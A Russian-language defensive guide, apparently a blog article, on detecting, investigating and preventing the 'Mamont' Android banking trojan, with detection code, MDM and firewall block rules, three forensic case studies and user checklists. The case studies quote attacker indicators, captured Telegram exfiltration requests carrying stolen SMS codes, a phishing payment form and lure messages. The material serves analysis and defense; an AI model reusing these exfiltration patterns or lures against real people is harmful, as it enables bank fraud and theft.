<h2 id="perehvat-cherez-tcpdump">Перехват через tcpdump</h2>
adb shell tcpdump -i any -s 0 -w /sdcard/capture.pcap
<h2 id="analiz-v-wireshark">Анализ в Wireshark</h2>
wireshark capture.pcap
<h2 id="ischem">Ищем:</h2>
<h2 id="post-zaprosy-s-dannymi-base64">- POST запросы с данными (base64)</h2>
<h2 id="zaprosy-k-telegram-api">- Запросы к Telegram API</h2>
<h2 id="dns-zaprosy-k-podozritelnym-domenam">- DNS запросы к подозрительным доменам</h2>3. Syscall tracing:
bash
<h2 id="otslezhivanie-sistemnyh-vyzovov">Отслеживание системных вызовов</h2>
adb shell strace -f -p <PID> -o /sdcard/trace.log
<h2 id="v-loge-ischem">В логе ищем:</h2>
<h2 id="open-data-data-databases-mmssms-db-chtenie-sms">- open("/data/data/*/databases/mmssms.db") # Чтение SMS</h2>
<h2 id="connect-k-vneshnim-ip">- connect() к внешним IP</h2>
<h2 id="write-s-bolshimi-obyomami-dannyh">- write() с большими объёмами данных</h2>Уровень 4: Machine Learning детектирование
Признаки для ML-модели:
Feature Engineering:
python
features = {
# Статические признаки
'num_dangerous_permissions': 5,
'has_sms_permission': True,
'has_internet': True,
'obfuscated': True,
'debug_certificate': False,
'certificate_age_days': 7,
# Структурные признаки
'num_activities': 3,
'num_services': 2,
'num_receivers': 5,
'has_boot_receiver': True,
# Код-признаки
'telegram_api_calls': 15,
'sms_api_calls': 23,
'reflection_usage': 8,
'dynamic_code_loading': True,
# Строковые признаки
'suspicious_strings_count': 42,
'url_count': 7,
'ip_addresses_count': 3,
}
Обучение модели:
python
import pandas as pd
from sklearn.ensemble import RandomForestClassifier
<h2 id="dataset-10000-legitimnyh-2000-mamont-semplov">Датасет: 10000 легитимных + 2000 Mamont сэмплов</h2>
df = pd.read_csv('apk_features_dataset.csv')
X = df.drop('is_malware', axis=1)
y = df['is_malware']
<h2 id="obuchenie">Обучение</h2>
model = RandomForestClassifier(n_estimators=100)
model.fit(X, y)
<h2 id="predskazanie-dlya-novogo-apk">Предсказание для нового APK</h2>
features_new = extract_features('suspicious.apk')
prediction = model.predict([features_new])
if prediction[0] == 1:
print("⚠️ MALWARE DETECTED")
prob = model.predict_proba([features_new])[0][1]
print(f"Confidence: {prob:.2%}")
Популярные ML-решения:
- Drebin — academic research, F1-score 94%
- MaMaDroid — поведенческий анализ
- DroidMiner — feature-based detection
Уровень 5: Поведенческая эвристика
Правила детектирования:
Эвристика 1: SMS-банкинг атака
python
def detect_sms_banking_attack(apk):
score = 0
# Проверяем разрешения
if has_permission(apk, 'READ_SMS'):
score += 30
if has_permission(apk, 'SEND_SMS'):
score += 30
if has_permission(apk, 'RECEIVE_SMS'):
score += 20
# Проверяем поведение
if calls_api(apk, 'abortBroadcast'):
score += 40 # Скрытие SMS — CRITICAL
if calls_api(apk, 'sendTextMessage'):
score += 20
# Проверяем сеть
if connects_to(apk, 'telegram.org'):
score += 30
return score >= 100 # Порог детектирования
<h2 id="rezultat-dlya-mamont-170-iz-100-detected">Результат для Mamont: 170 из 100 (DETECTED)</h2>Эвристика 2: Credential harvesting
python
def detect_credential_theft(apk):
red_flags = []
# AccessibilityService — keylogging
if uses_service(apk, 'BIND_ACCESSIBILITY_SERVICE'):
red_flags.append("Accessibility abuse")
# Overlay attacks
if has_permission(apk, 'SYSTEM_ALERT_WINDOW'):
red_flags.append("Overlay attack possible")
# Screenrecording
if uses_api(apk, 'MediaProjection'):
red_flags.append("Screen recording")
return len(red_flags) >= 2
<h2 id="mamont-v-2026-ispolzuet-vse-tri-tehniki">Mamont в 2026 использует все три техники</h2>Интеграция с корпоративной защитой
Для компаний и банков:
1. MDM (Mobile Device Management):
javascript
// Политика: блокировать APK вне Google Play
{
"blockUnknownSources": true,
"allowedInstallers": [
"com.android.vending", // Google Play
"com.huawei.appmarket" // Huawei AppGallery (для китайских телефонов)
],
"blockedApps": [
"com.delivery.tracker", // Known Mamont package
"com.system.updates"
]
}
2. Runtime Application Self-Protection (RASP):
java
// В банковское приложение встраивается защита
public class BankApp extends Application {
@Override
public void onCreate() {
super.onCreate();
// Проверка на root
if (RootDetection.isRooted()) {
showSecurityWarning();
return;
}
// Детектирование вредоносов
if (MalwareScanner.detectMamont()) {
alertSecurityTeam();
lockApp();
}
}
}
3. Network-level blocking:
bash
<h2 id="blokirovka-c2-na-urovne-korporativnogo-firewall">Блокировка C2 на уровне корпоративного firewall</h2>
<h2 id="ispolzuem-threat-intelligence-feeds">Используем threat intelligence feeds</h2>
iptables -A OUTPUT -d 185.215.113.0/24 -j DROP
iptables -A OUTPUT -d 45.142.212.0/24 -j DROP
<h2 id="ili-cherez-dns-sinkhole">Или через DNS sinkhole</h2>
<h2 id="track-order-ru-0-0-0-0">track-order.ru -> 0.0.0.0</h2>Практический чеклист для пользователей
Проверка перед установкой:
text
✅ Чеклист безопасности APK:
1. Источник
□ Скачан из официального Google Play?
□ Ссылка ведёт на play.google.com?
□ Не из Telegram/WhatsApp/Email?
2. Разработчик
□ Известная компания?
□ Есть сайт и контакты?
□ Положительные отзывы в Google Play?
3. Разрешения
□ Запрашивает только необходимые?
□ НЕТ: SMS + Контакты + Телефон?
□ НЕТ: Accessibility Service?
4. Файл
□ Расширение .apk (не .jpg.apk)?
□ Размер адекватный (> 1 МБ)?
□ Имя файла без странных символов?
5. Перед установкой
□ Проверен антивирусом?
□ Проверен на VirusTotal?
□ Есть сомнения? НЕ УСТАНАВЛИВАТЬ!
Если хотя бы один пункт НЕ выполнен — УДАЛИТЬ ФАЙЛ!
Проверка установленных приложений:
bash
<h2 id="skript-dlya-proverki-telefona-na-mamont">Скрипт для проверки телефона на Mamont</h2>
adb shell pm list packages -3 # Список сторонних приложений
<h2 id="dlya-kazhdogo-podozritelnogo">Для каждого подозрительного:</h2>
adb shell pm dump <package> | grep -E "permission|installer"
<h2 id="priznaki-zarazheniya">Признаки заражения:</h2>
<h2 id="installer-null-ustanovleno-vruchnuyu">- Installer: null (установлено вручную)</h2>
<h2 id="razresheniya-read-sms-send-sms-read-contacts">- Разрешения: READ_SMS, SEND_SMS, READ_CONTACTS</h2>
<h2 id="ustanovleno-nedavno-ne-pomnite-ustanovku">- Установлено недавно, не помните установку</h2>Практические кейсы расследований
Реальные кейсы форензических расследований помогают понять, как схема "Мамонт" работает на практике и какие методы используют эксперты для раскрытия инцидентов.
Кейс 1: Атака через домовой чат
Описание инцидента:
Дата: 15 января 2026
Жертв: 23 человека из одного дома
Общий ущерб: 3,2 млн рублей
Хронология событий:
День 1 — 15.01.2026, 19:30
- В домовой чат Telegram приходит сообщение от "соседа"
- Текст: "Всем добрый вечер! Нашел фото со двора, кто-то машину поцарапал. Кто знает чья? [ссылка]"
- Ссылка ведёт на файл "Фото_царапины.apk"
День 1 — 19:35-20:15
- 23 человека скачивают файл
- Android предупреждает: "Установка из неизвестных источников"
- Большинство игнорируют предупреждение (доверие к "соседу")
- Mamont установлен на 23 устройства
День 2 — 16.01.2026, утро
- Начинаются звонки от "банковской безопасности"
- "У нас подозрительная операция, назовите код из SMS"
- Жертвы называют коды, не подозревая подвоха
- Троян уже перехватил SMS, мошенники знают балансы
День 2 — течение дня
- С 23 счетов списано от 50 до 300 тысяч рублей
- Деньги переведены на подставные счета
- Через криптообменники выведено в Bitcoin
Форензическое расследование:
Этап 1: Сбор доказательств
bash
<h2 id="izyatie-smartfonov-poterpevshih">Изъятие смартфонов потерпевших</h2>
adb backup -apk -all -f victim_01_backup.ab
<h2 id="izvlechenie-apk-fayla">Извлечение APK-файла</h2>
adb pull /data/app/com.photo.viewer/base.apk mamont_sample.apk
<h2 id="vychislenie-hesha">Вычисление хэша</h2>
sha256sum mamont_sample.apk
<h2 id="rezultat-7d865e959b2466918c9863afca942d0fb76679c68">Результат: 7d865e959b2466918c9863afca942d0fb76679c68...</h2>Этап 2: Анализ трояна
bash
<h2 id="dekompilyatsiya">Декомпиляция</h2>
jadx mamont_sample.apk -d decompiled/
<h2 id="obnaruzheno">Обнаружено:</h2>
<h2 id="telegram-bot-token-6851234567-aahdqtcvch1vgwjxfseofsas">- Telegram Bot Token: 6851234567:AAHdqTcvCH1vGWJxfSeofSAs</h2>
<h2 id="chat-id-atakuyuschego-529876543">- Chat ID атакующего: 529876543*</h2>
<h2 id="c2-server-https-track-photo-com-api-upload">- C2 сервер: https://track-photo[.]com/api/upload</h2>Этап 3: Анализ сетевого трафика
text
<h2 id="perehvachennye-zaprosy-k-telegram-api">Перехваченные запросы к Telegram API:</h2>
POST https://api.telegram.org/bot6851234567:*/sendMessage
{
"chat_id": "529876543*",
"text": "🆕 Новая жертва #23\n📱 +7916*1234\n💰 Сбербанк: 127,450₽"
}
POST https://api.telegram.org/bot6851234567:*/sendMessage
{
"chat_id": "529876543*",
"text": "📩 SMS от 900: Код 3456 для входа"
}
Этап 4: Идентификация атакующих
bash
<h2 id="cherez-telegram-bot-api-poluchena-informatsiya">Через Telegram Bot API получена информация:</h2>
<h2 id="username-bota-home-photo">- Username бота: @home_photo_***</h2>
<h2 id="sozdan-14-01-2026-za-den-do-ataki">- Создан: 14.01.2026 (за день до атаки)</h2>
<h2 id="vladelets-skryt">- Владелец: скрыт</h2>
<h2 id="cherez-kriptobirzhi">Через криптобиржи:</h2>
<h2 id="btc-adres-bc1q">- BTC адрес: bc1q*...</h2>
<h2 id="tranzaktsii-na-summu-40-000">- Транзакции на сумму ~$40,000</h2>
<h2 id="chast-vyvedena-cherez-mixer-chast-na-birzhu">- Часть выведена через mixer, часть на биржу</h2>
<h2 id="kyc-dannye-zaprosheny-u-birzhi-cherez-mvd">- KYC данные запрошены у биржи (через МВД)</h2>Результат:
- Идентифицирована группа из 3 человек
- Возбуждено уголовное дело по ст. 159.6 УК РФ (мошенничество в сфере компьютерной информации)
- Арестовано 2 подозреваемых, 1 в розыске
- Часть средств заморожена на криптобиржах
Кейс 2: Фейковый маркетплейс с Avito
Описание инцидента:
Дата: 10-18 января 2026
Жертв: ~400 человек по всей России
Общий ущерб: 18 млн рублей
Схема атаки:
1. Размещение объявлений на Avito
- Новые аккаунты, созданные за 1-2 дня
- Популярные товары: iPhone, MacBook, PlayStation 5
- Цена: -30% от рыночной
- Контакт: "Пишите в Telegram @seller_*"
2. Переписка в Telegram
text
Продавец: Товар в наличии, новый, с гарантией
Покупатель: Можно фото?
Продавец: Конечно! Вот ссылка на мой магазин,
там все фото: https://avlto-market[.]com
3. Фейковый маркетплейс
- Домен: avlto-market[.]com (подменная "l" на "i")
- Интерфейс: 95% копия Avito
- SSL-сертификат: Let's Encrypt (выглядит легитимно)
- При оформлении заказа: "Установите приложение для отслеживания"
4. Установка Mamont
- APK-файл: "Avito_Tracker_2026.apk"
- Размер: 4.2 МБ (правдоподобно)
- Иконка: копия логотипа Avito
- После установки: "Заказ оформлен, ожидайте звонка курьера"
5. Кража средств
- Через 1-3 часа: SMS с кодом от банка перехвачены
- Операции: переводы на подставные счета
- Среднее списание: 45,000 рублей с одной жертвы
Форензическое расследование:
Этап 1: Инфраструктура атаки
bash
<h2 id="domen-avlto-market-com">Домен avlto-market.com</h2>
whois avlto-market.com
Registrar: Namecheap
Created: 2026-01-08 (за 2 дня до атаки)
Expires: 2027-01-08
Registrant: WhoisGuard Protected
<h2 id="ip-adres">IP-адрес</h2>
dig avlto-market.com
185.215.113.XXX # Bulletproof хостинг, Москва
<h2 id="ssl-sertifikat">SSL-сертификат</h2>
openssl s_client -connect avlto-market.com:443
Issuer: Let's Encrypt
Valid from: 2026-01-09
Valid to: 2026-04-09
Этап 2: Анализ сайта
html
<!-- Исходный код показывает признаки фишинга -->
<!-- Форма оплаты ведёт на левый gateway -->
<form action="https://pay-gateway[.]xyz/process">
<input name="card_number">
<input name="cvv">
<input name="expiry">
</form>
<!-- Ссылка на скачивание APK -->
<a href="https://cdn-avito[.]com/app/tracker.apk">
Скачать приложение
</a>
<!-- cdn-avito.com НЕ принадлежит реальному Avito! -->
Этап 3: Reverse engineering APK
bash
<h2 id="izvlechenie-iz-apk-informatsii-o-c2">Извлечение из APK информации о C2</h2>
strings Avito_Tracker_2026.apk | grep -E "http|api"
<h2 id="obnaruzheno">Обнаружено:</h2>
https://api.telegram.org/bot7239845612:AAE_*
https://c2-backend[.]xyz/api/victims
https://crypto-out[.]com/cashout
<h2 id="dekompilyatsiya-pokazala">Декомпиляция показала:</h2>
<h2 id="mamont-versiya-2-3-1">- Mamont версия 2.3.1</h2>
<h2 id="moduli-sms-contacts-keylogger-nfcgate">- Модули: SMS, Contacts, Keylogger, NFCGate</h2>
<h2 id="avtomaticheskaya-rassylka-po-adresnoy-knige">- Автоматическая рассылка по адресной книге</h2>Этап 4: Трекинг денежных потоков
text
Схема вывода:
Жертва (банковский счёт)
↓
Подставное лицо "дроп" (50+ счетов)
↓
Криптообменник (5 разных сервисов)
↓
Bitcoin wallet (bc1q*...)
↓
Mixer (Wasabi Wallet)
↓
Зарубежная биржа (Binance, Bybit)
↓
Обнал через P2P
Прослежено:
- 18 млн руб → ~$190,000
- Через mixer прошло ~75% ($142,500)
- Обналичено через P2P в 7 странах
Результат:
- Идентифицирована организованная группа (7 человек)
- Заблокировано 23 домена
- Арестовано 4 подозреваемых
- Изъято компьютерное оборудование, CRM-система мошенников
- Возбуждено уголовное дело по ст. 159.6, ч. 4 (организованная группа)
Кейс 3: Корпоративная атака через поддельное приложение банка
Описание инцидента:
Дата: 22 января 2026
Жертв: Сотрудники IT-компании (87 человек)
Ущерб: 12 млн рублей + остановка бизнес-процессов
Вектор атаки:
1. Целевой фишинг (spear phishing)
- Email от "Бухгалтерии": "Срочно! Изменение реквизитов для зарплаты"
- Письмо выглядит легитимно (логотип компании, правильные ФИО)
- Ссылка: "Установите обновление приложения банка для получения зарплаты"
2. Социальная инженерия
text
Текст письма:
Уважаемые сотрудники!
В связи с переходом на новую систему ЦБ РФ,
банк обновил своё мобильное приложение.
Для получения зарплаты 25.01.2026 необходимо
установить обновлённую версию.
Скачать: [ссылка на APK]
С уважением,
Бухгалтерия ООО "*"
3. Массовое заражение
- 87 сотрудников установили "обновление"
- На самом деле — Mamont 2.3 с корпоративным модулем
- Троян начал собирать:
- Банковские данные
- Корпоративную переписку
- Доступы к рабочим системам
4. Атака на бизнес
- Через 2 дня: фишинг на поставщиков от имени компании
- Фейковые счета на оплату
- Изменение реквизитов в переписке
- Компании-поставщики перевели деньги не туда
Форензическое расследование:
Этап 1: Incident Response
bash
<h2 id="den-1-obnaruzhenie">День 1: Обнаружение</h2>
<h2 id="security-analyst-zametil-anomaliyu-v-siem">Security analyst заметил аномалию в SIEM:</h2>
<h2 id="87-ustroystv-odnovremenno-podklyuchilis-k-podozritelnomu-ip">- 87 устройств одновременно подключились к подозрительному IP</h2>
<h2 id="massovye-sms-zaprosy-s-korporativnyh-telefonov">- Массовые SMS-запросы с корпоративных телефонов</h2>
<h2 id="nemedlennye-deystviya">Немедленные действия:</h2>
1. Изоляция скомпрометированных устройств
2. Блокировка C2 IP на firewall
3. Уведомление сотрудников
4. Контакт с банками для заморозки операций
Этап 2: Malware analysis
python
<h2 id="analiz-pokazal-modifikatsiyu-mamont-dlya-korporativnoy-sredy">Анализ показал модификацию Mamont для корпоративной среды</h2>
class CorporateMamont:
def __init__(self):
# Базовый Mamont функционал
self.sms_interceptor = True
self.contact_stealer = True
self.c2_telegram = True
# НОВОЕ: корпоративные модули
self.email_reader = True # Чтение корп. почты
self.slack_interceptor = True # Перехват Slack
self.vpn_credential_stealer = True # Кража VPN доступов
self.screenshot_on_keyword = True # Скриншот при "пароль", "счёт"
def target_identification(self):
# Определение ценных целей
if self.is_finance_dept():
priority = "CRITICAL"
steal_all_data()
elif self.is_admin():
priority = "HIGH"
steal_credentials()
Этап 3: Экспертиза email-кампании
text
Анализ фишингового письма:
From: <bukh@*company.ru> # Поддельный адрес
Real sender IP: 194.186.142.* (VPN endpoint)
SPF: FAIL
DKIM: FAIL
DMARC: FAIL # Все проверки провалены!
Вложение: Обновление_Банк_2026.pdf.apk
^^^^^^^^^ ^^^^ ДВОЙНОЕ РАСШИРЕНИЕ!
Настоящий файл: APK (вредонос), не PDF!
Metadata APK:
Package: com.sberbank.mobile.official # Поддельный package name
Real package: com.malware.corp.v2
Certificate: Self-signed, created 2026-01-20
Этап 4: Расследование финансовых потерь
text
Цепочка хищений:
1. Прямые потери от сотрудников: 4,2 млн руб
- 87 сотрудников × ~48,000 руб средний ущерб
2. BEC-атака (Business Email Compromise): 7,8 млн руб
- Перехват переписки с поставщиками
- Подмена реквизитов в email
- 3 крупных перевода на фейковые счета
3. Непрямые потери:
- Остановка бизнес-процессов: ~2 дня
- Расследование и восстановление: 500 тыс руб
- Аудит безопасности: 1 млн руб
- Репутационный ущерб: неоценим
Результат:
- Внедрён обязательный Mobile Threat Defense (MTD)
- Блокировка установки APK вне Google Play через MDM
- Обучение сотрудников кибергигиене
- Настроен мониторинг в режиме 24/7
- Возбуждено уголовное дело, идёт расследование
Ключевые выводы из кейсов
Общие паттерны атак "Мамонт":
1. Социальная инженерия — основной вектор
- Доверие к знакомым источникам
- Эмоциональное давление (срочность)
- Выгодные предложения
2. Технические трюки
- Двойные расширения (.pdf.apk)
- Поддельные package names
- Копирование интерфейсов
3. Скорость — ключ к успеху
- От заражения до кражи: 1-3 часа
- Быстрый вывод средств через крипту
- Короткая жизнь инфраструктуры (2-7 дней)
4. Масштабирование
- Автоматизация через Telegram-ботов
- CRM-системы для управления жертвами
- Распределённая инфраструктура
Методы защиты из практики:
text
Техническая защита:
✅ MDM с блокировкой sideloading
✅ EDR/XDR на корпоративных устройствах
✅ Network monitoring (SIEM)
✅ Application control (whitelisting)
Организационная защита:
✅ Регулярное обучение сотрудников
✅ Incident Response Plan
✅ Regular security audits
✅ Threat intelligence feeds
Процессная защита:
✅ Двухфакторная аутентификация (2FA)
✅ Ограничение прав установки приложений
✅ Мониторинг аномальной активности
✅ Резервное копирование данных
Защита и профилактика для пользователей
Лучшая защита от схемы "Мамонт" — это профилактика. Рассмотрим конкретные шаги для защиты личных и корпоративных данных.
Для обычных пользователей
Золотые правила безопасности:
Правило 1: Никогда не устанавливайте APK из мессенджеров
text
❌ ОПАСНО:
- Файл пришёл в Telegram/WhatsApp/Viber
- Ссылка ведёт на прямое скачивание .apk
- "Установите для просмотра фото/видео"
✅ БЕЗОПАСНО:
- Только через Google Play Store
- Официальные сайты разработчиков
- App Gallery (для Huawei)
Правило 2: Проверяйте расширения файлов
bash
<h2 id="opasnye-patterny">Опасные паттерны:</h2>
фото.apk # ❌ Фото — это .jpg/.png, не .apk!
видео.apk # ❌ Видео — это .mp4/.avi, не .apk!
документ.pdf.apk # ❌ Двойное расширение — классический трюк
счёт_январь.apk # ❌ Счета — это .pdf/.xlsx, не .apk!
<h2 id="bezopasnye-rasshireniya-dlya-media">Безопасные расширения для медиа:</h2>
.jpg .png .gif .mp4 .avi .mp3 .pdf .doc .xlsx
Правило 3: Проверяйте разрешения перед установкой
text
🚨 КРАСНЫЕ ФЛАГИ — немедленно удалить:
❌ Калькулятор запрашивает доступ к SMS
❌ Фонарик запрашивает доступ к контактам
❌ Игра запрашивает доступ к телефону
❌ "Трекер посылок" запрашивает Accessibility Service
💡 Принцип: приложение должно запрашивать ТОЛЬКО
те разрешения, которые нужны для его работы.
Правило 4: Проверяйте источник через Google Play
text
Шаг 1: Получили ссылку на "приложение"
Шаг 2: НЕ переходите по ссылке
Шаг 3: Откройте Google Play
Шаг 4: Найдите приложение через официальный поиск
Шаг 5: Проверьте разработчика (должен совпадать с официальным)
Шаг 6: Только если всё OK — устанавливайте
Пример:
Ссылка: "Скачать Wildberries Track"
→ Открываете Play Store
→ Ищете "Wildberries"
→ Разработчик: ООО "Вайлдберриз" ✅
→ 100M+ установок ✅
→ Рейтинг 4.5★ ✅
→ МОЖНО устанавливать
Правило 5: Используйте антивирус
text
Рекомендуемые решения для Android:
Бесплатные:
• Kaspersky Internet Security
• Dr.Web Security Space
• ESET Mobile Security
Встроенные:
• Google Play Protect (уже в Android)
• Samsung Knox (на устройствах Samsung)
Настройка:
✅ Включить сканирование при установке
✅ Включить проверку приложений
✅ Включить защиту от фишинга
✅ Регулярно обновлять базы
Для продвинутых пользователей
Настройка параметров безопасности Android:
1. Отключение установки из неизвестных источников
text
Настройки → Безопасность → Неизвестные источники → ВЫКЛ
Или для Android 8+:
Настройки → Приложения → Особые права →
Установка неизвестных приложений →
Для каждого приложения: Запретить
Исключение: можно разрешить ТОЛЬКО для проверенных:
✅ Chrome (если качаете с известных сайтов)
✅ Samsung Internet
❌ Telegram, WhatsApp — НИКОГДА!
2. Мониторинг установленных приложений
bash
<h2 id="cherez-adb-dlya-teh-kto-umeet">Через ADB (для тех, кто умеет)</h2>
adb shell pm list packages -3 # Список сторонних приложений
<h2 id="chto-iskat">Что искать:</h2>
<h2 id="prilozheniya-kotorye-vy-ne-ustanavlivali">- Приложения, которые вы не устанавливали</h2>
<h2 id="podozritelnye-imena-paketov-com-system-org-update">- Подозрительные имена пакетов (com.system.*, org.update.*)</h2>
<h2 id="prilozheniya-bez-ikonki-v-launcher">- Приложения без иконки в launcher</h2>
<h2 id="proverka-poslednih-ustanovok">Проверка последних установок:</h2>
adb shell dumpsys package | grep firstInstallTime
<h2 id="udalenie-podozritelnogo">Удаление подозрительного:</h2>
adb shell pm uninstall <package.name>
3. Проверка на root/модификации
bash
<h2 id="mamont-chasto-pytaetsya-poluchit-root">Mamont часто пытается получить root</h2>
<h2 id="proverka">Проверка:</h2>
<h2 id="1-nalichie-superuser-app">1. Наличие Superuser app</h2>
ls /system/app/Superuser.apk
ls /system/app/SuperSU.apk
<h2 id="2-su-binary">2. Su binary</h2>
which su
<h2 id="esli-vyvodit-put-ustroystvo-rutovano">Если выводит путь → устройство рутовано</h2>
<h2 id="3-proverka-cherez-prilozhenie">3. Проверка через приложение</h2>
<h2 id="root-checker-by-joeykrim-v-play-store">Root Checker by joeykrim (в Play Store)</h2>
<h2 id="esli-ustroystvo-bylo-rutovano-bez-vashego-vedoma-zarazheno">Если устройство было рутовано без вашего ведома → заражено!</h2>4. Мониторинг сетевой активности
bash
<h2 id="afwall-trebuet-root">AFWall+ (требует root)</h2>
<h2 id="firewall-dlya-android">- Firewall для Android</h2>
<h2 id="blokiruet-prilozheniyam-dostup-k-internetu">- Блокирует приложениям доступ к интернету</h2>
<h2 id="logiruet-vse-soedineniya">- Логирует все соединения</h2>
<h2 id="netguard-bez-root">NetGuard (без root)</h2>
<h2 id="vpn-based-firewall">- VPN-based firewall</h2>
<h2 id="blokiruet-po-prilozheniyam">- Блокирует по приложениям</h2>
<h2 id="pokazyvaet-statistiku-trafika">- Показывает статистику трафика</h2>
<h2 id="chto-iskat">Что искать:</h2>
<h2 id="prilozheniya-otpravlyayuschie-mnogo-dannyh">- Приложения, отправляющие много данных</h2>
<h2 id="soedineniya-k-podozritelnym-ip">- Соединения к подозрительным IP</h2>
<h2 id="aktivnost-v-nochnoe-vremya-kogda-vy-spite">- Активность в ночное время (когда вы спите)</h2>Для компаний и организаций
Корпоративная стратегия защиты:
1. Mobile Device Management (MDM)
javascript
// Пример политики в VMware Workspace ONE
{
"name": "Anti-Mamont Policy",
"rules": {
"block_unknown_sources": true,
"enforce_play_protect": true,
"require_device_encryption": true,
"block_usb_debugging": true,
"allowed_app_sources": [
"com.android.vending" // Только Google Play
],
"blocked_packages": [
"com.delivery.tracker",
"com.system.updates",
"com.photo.viewer",
// ... список известных Mamont пакетов
],
"required_permissions_warning": {
"SMS": "High risk",
"CONTACTS": "Medium risk",
"ACCESSIBILITY": "Critical risk"
}
},
"compliance_actions": {
"violation": "quarantine_device",
"remediation": "wipe_device"
}
}
2. Mobile Threat Defense (MTD)
text
Рекомендуемые решения:
Коммерческие:
• Zimperium zIPS
• Lookout Mobile Endpoint Security
• Check Point Harmony Mobile
• Pradeo Security
Функции MTD:
✅ Детектирование вредоносных приложений в реальном времени
✅ Анализ поведения приложений
✅ Защита от фишинга
✅ Обнаружение network-based атак
✅ Защита от man-in-the-middle
✅ Compliance reporting
3. Security Awareness Training
markdown
<h2 id="programma-obucheniya-sotrudnikov-ezhekvartalno">Программа обучения сотрудников (ежеквартально)</h2>
<h2 id="modul-1-bazovaya-kibergigiena-1-chas">Модуль 1: Базовая кибергигиена (1 час)</h2>
- Что такое фишинг и как его распознать
- Опасности установки APK из неизвестных источников
- Проверка подлинности приложений
<h2 id="modul-2-mobilnaya-bezopasnost-1-chas">Модуль 2: Мобильная безопасность (1 час)</h2>
- Схема "Мамонт" и как она работает
- Реальные кейсы атак на сотрудников компаний
- Что делать при подозрении на заражение
<h2 id="modul-3-incident-response-30-min">Модуль 3: Incident Response (30 мин)</h2>
- Куда обращаться при инциденте
- Как сохранить доказательства
- Процедура реагирования
<h2 id="modul-4-prakticheskie-uprazhneniya-30-min">Модуль 4: Практические упражнения (30 мин)</h2>
- Симуляция фишинговой атаки
- Проверка знаний (тест)
- Выдача сертификата
Метрики успеха:
- Click rate на фишинг < 5%
- Report rate подозрительных писем > 80%
- Инциденты с установкой вредоносов: 0
4. Technical Controls
yaml
<h2 id="primer-konfiguratsii-korporativnoy-zaschity">Пример конфигурации корпоративной защиты</h2>
network_security:
firewall:
- block_known_c2_servers: true
- block_bulletproof_hosting: true
- threat_intelligence_feeds:
- abuse.ch
- spamhaus
- custom_mamont_ioc
dns:
- dns_filtering: true
- block_newly_registered_domains: true # < 30 дней
- sinkhole_malicious_domains: true
endpoint_security:
mobile:
- mdm_enforced: true
- mtd_solution: "Zimperium"
- app_reputation: true
- certificate_pinning: true
detection:
- edr_agent: true
- behavioral_analysis: true
- anomaly_detection: true
- siem_integration: true
email_security:
anti_phishing:
- attachment_sandboxing: true
- url_rewriting: true
- block_apk_attachments: true # ❗ Важно!
- spf_dkim_dmarc_enforcement: strict
incident_response:
automated_actions:
- isolate_device_on_ioc_match: true
- notify_security_team: true
- kill_malicious_process: true
- collect_forensics: true
Что делать если уже заражены
Немедленные действия:
Шаг 1: Отключение сети (0-5 минут)
1
. Включите режим полёта (Airplane Mode)
- Отключает GSM, Wi-Fi, Bluetooth
- Прерывает связь с C2
2. НЕ перезагружайте устройство!
- Можете потерять важные доказательства в RAM
3. Отключите передачу данных
- Настройки → Сеть → Передача данных → ВЫКЛ
Шаг 2: Уведомление банка (5-15 минут)
text
Звоните в банк с другого телефона!
Сообщите:
1. "Мой телефон взломан, заблокируйте мобильный банк"
2. "Проверьте последние операции за сегодня"
3. "Нужна замена карты"
4. "Смените все пароли в интернет-банке"
Не используйте заражённый телефон для звонка —
мошенники могут перехватить разговор!
Шаг 3: Сохранение доказательств (15-30 минут)
bash
<h2 id="esli-est-navyki-i-vtoroe-ustroystvo">Если есть навыки и второе устройство:</h2>
<h2 id="podklyuchite-telefon-po-usb">Подключите телефон по USB</h2>
adb devices
<h2 id="sdelayte-skrinshot-spiska-prilozheniy">Сделайте скриншот списка приложений</h2>
adb shell pm list packages -f > installed_apps.txt
<h2 id="izvlekite-podozritelnyy-apk">Извлеките подозрительный APK</h2>
adb shell pm path com.suspicious.package
<h2 id="otvet-data-app-com-suspicious-package-base-apk">Ответ: /data/app/com.suspicious.package/base.apk</h2>
adb pull /data/app/com.suspicious.package/base.apk malware_sample.apk
<h2 id="sohranite-logi">Сохраните логи</h2>
adb logcat -d > device_logs.txt
<h2 id="sdelayte-polnyy-backup-mozhet-zanyat-chas">Сделайте полный backup (может занять час!)</h2>
adb backup -apk -shared -all -f full_backup.ab
Шаг 4: Обращение в правоохранительные органы (день 1)
text
Куда обратиться:
1. МВД России — Управление "К"
- Сайт: мвд.рф
- Телефон: 112 (с мобильного)
2. Киберполиция
- Онлайн-заявление: мвд.рф/request_main
3. Банк России (для финансовых инцидентов)
- Сайт: cbr.ru
Что взять с собой:
✅ Заражённое устройство (НЕ сбрасывать!)
✅ Скриншоты переписки с мошенниками
✅ Выписки по счетам
✅ Любые сохранённые доказательства
Шаг 5: Восстановление (день 2-3)
1
. Factory Reset (сброс к заводским настройкам)
- Настройки → Система → Сброс → Удалить все данные
- ❗ Только ПОСЛЕ сохранения доказательств!
2. Восстановление из резервной копии
- Используйте backup, сделанный ДО заражения
- Проверьте дату последнего чистого backup
3. Смена всех паролей
- Email
- Банки
- Социальные сети
- Рабочие аккаунты
4. Включение 2FA везде
- SMS-коды + приложение-аутентификатор
- НЕ полагайтесь только на SMS!
Чего НЕ делать:
text
❌ НЕ пытайтесь удалить только вредоносное приложение
(могут остаться скрытые компоненты)
❌ НЕ продолжайте пользоваться устройством "для важных дел"
(мошенники видят ВСЁ)
❌ НЕ переустанавливайте приложение заново
("может, в этот раз будет безопасно" — НЕТ!)
❌ НЕ доверяйте "антивирусам", которые "нашли и удалили угрозу"
(Mamont может маскироваться)
✅ ТОЛЬКО полный сброс устройства!
Проактивная защита: чеклист
markdown
<h2 id="ezhenedelnye-deystviya">Еженедельные действия:</h2>
□ Проверить список установленных приложений
□ Посмотреть статистику использования батареи (ищите подозрительные процессы)
□ Проверить активные сервисы (Настройки → Приложения → Запущенные)
<h2 id="ezhemesyachnye-deystviya">Ежемесячные действия:</h2>
□ Обновить все приложения
□ Обновить операционную систему
□ Проверить разрешения приложений (Настройки → Приложения → Разрешения)
□ Сделать backup данных
<h2 id="ezhekvartalnye-deystviya">Ежеквартальные действия:</h2>
□ Провести полное сканирование антивирусом
□ Проверить список приложений с Device Admin правами
□ Проверить аккаунты Google на подозрительную активность
□ Сменить критичные пароли
<h2 id="posle-kazhdoy-podozritelnoy-aktivnosti">После каждой подозрительной активности:</h2>
□ Скан антивирусом
□ Проверка списка приложений
□ Проверка банковских операций
□ При малейшем подозрении — обращение к специалистам
